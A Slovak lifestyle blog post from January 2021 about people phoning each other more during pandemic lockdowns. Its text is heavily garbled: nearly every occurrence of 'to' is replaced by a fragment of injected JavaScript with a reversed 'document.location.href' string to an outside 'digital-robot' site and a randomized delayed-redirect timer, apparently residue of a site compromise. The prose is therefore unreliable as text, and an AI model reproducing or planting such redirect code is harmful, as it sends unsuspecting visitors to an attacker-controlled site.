Telefonovanie je opäť cool

| január 31, 2021

Rok 2020 priniesol veľa životných zmien. Menej chodíme von, menej cestujeme, takmer vôbec sa nestretávame. Aj tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to si, prirodzene, vyberá svoju daň, a tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to najmä na ľudskej psychike. Jednou z hlavných ľudských potrieb je potreba socializovať sa a byť v spoločnosti iných ľudí. Posledných pár mesiacov strávených v karanténe sa však výrazne odrazilo najmä na našich telefónnych účtobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toch. A dôvod nie je prekvapivý.

Človek ako tvor spoločenský potrebuje byť v ľudskom kontakte prakticky neustále. Či už sa označujete za extrovertku alebo jej pravý opak, úplne každý z nás potrebuje dennodenne zažívať istý druh ľudského kontaktu. A tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to či už priameho alebo nepriameho, osobného alebo neosobného, verbálneho či neverbálneho. Za posledné mesiace sa ale kvôli obmedzeniam stal – najmä ten priamy, ľudský kontakt – skôr privilégiom. To sa však odrazilo na štatitikách mobilných operátobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torov. Za posledné obdobie sme sa tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totiž nanovo obnovil starý dobrý fenomén “klasického” telefonovania.

V podstate až do začiatku marca 2020 nám naše mobilné telefóny slúžili doslova na všetko možné, s výnimkou ich pravého účelu – telefonovania. A keďže sú dnešné moderné smartfóny v podstate len zmenšené verzie výkonných počítačov a fotobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toaparátobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tov, na ich primárnu funkciu ako je smskovanie či volanie sa až tak častobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, žiaľ, nepoužívajú. Veď na tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to už predsa existujú aplikácie, v ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torých sa môžeme ľahko a jednoducho dorozumievať pomocou písmen a správ, tak načo zdvíhať telefón? Za posledných pár mesiacov, kedy sa pandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andemická situácia po celom svete začala rapídne zhoršovať, sa tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to však zmenilo. Mobilní operátobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tori hlásia obrovské nárasty v počte telefonátobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tov, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toré sme si medzi sebou vymenili. Prečo je tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to však tak?

Hoci si tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to častobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to ani neuvedomujeme, ľudský hlas je veľmi silný nástroj. Vďaka nemu dokážeme okamžite rozoznať či už náladu, postobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toj alebo citobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tové rozpoloženie, v ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torom sa ten druhý momentálne nachádza. Bolo vedecky dokázané, že sa do hlasu ako takého dokážeme dokonca aj zamilovať, a tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to bez tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toho aby sme jeho majiteľa poznali, či vôbec niekedy predtým videli. O tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to väčšiu moc má hlas práve v dobách, kedy jedinou možnosťou ako sa môžeme s našimi blízkymi “reálne” porozprávať, je práve zdvihnutím telefónu, ako tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomu bolo kedysi, keď moderné technológie ani nesnívali o tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom, že budú raz na takej úrovni, na akej sú dnes. 

Tým, že sme schopní našu rodinu, či priateľov aspoň počuť z druhej strany linky nám poskytuje akýsi osobnejší, bližší kontakt ako len pri pasívnom smskovaní. Vďaka tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomu sa môžeme cítiť aj my aspoň trošku ľudskejšie a spoločenskejšie aj za týchtobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to netradičných podmienok. Hoci je vytáčanie čísel, zdá sa, len na chvíľu reinkarnovaným fenoménom, treba uznať, že má niečo do seba a dopriať si ho sem-tam aj v časoch, kedy nie je našou jedinou možnosťou, ako sa spojiť s blízkymi a priateľmi. 

Fotobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to: i-d.com, marieclaire.com

Tags:

Category: HOMEPAGE, VZŤAHY & SEX

Comments are closed.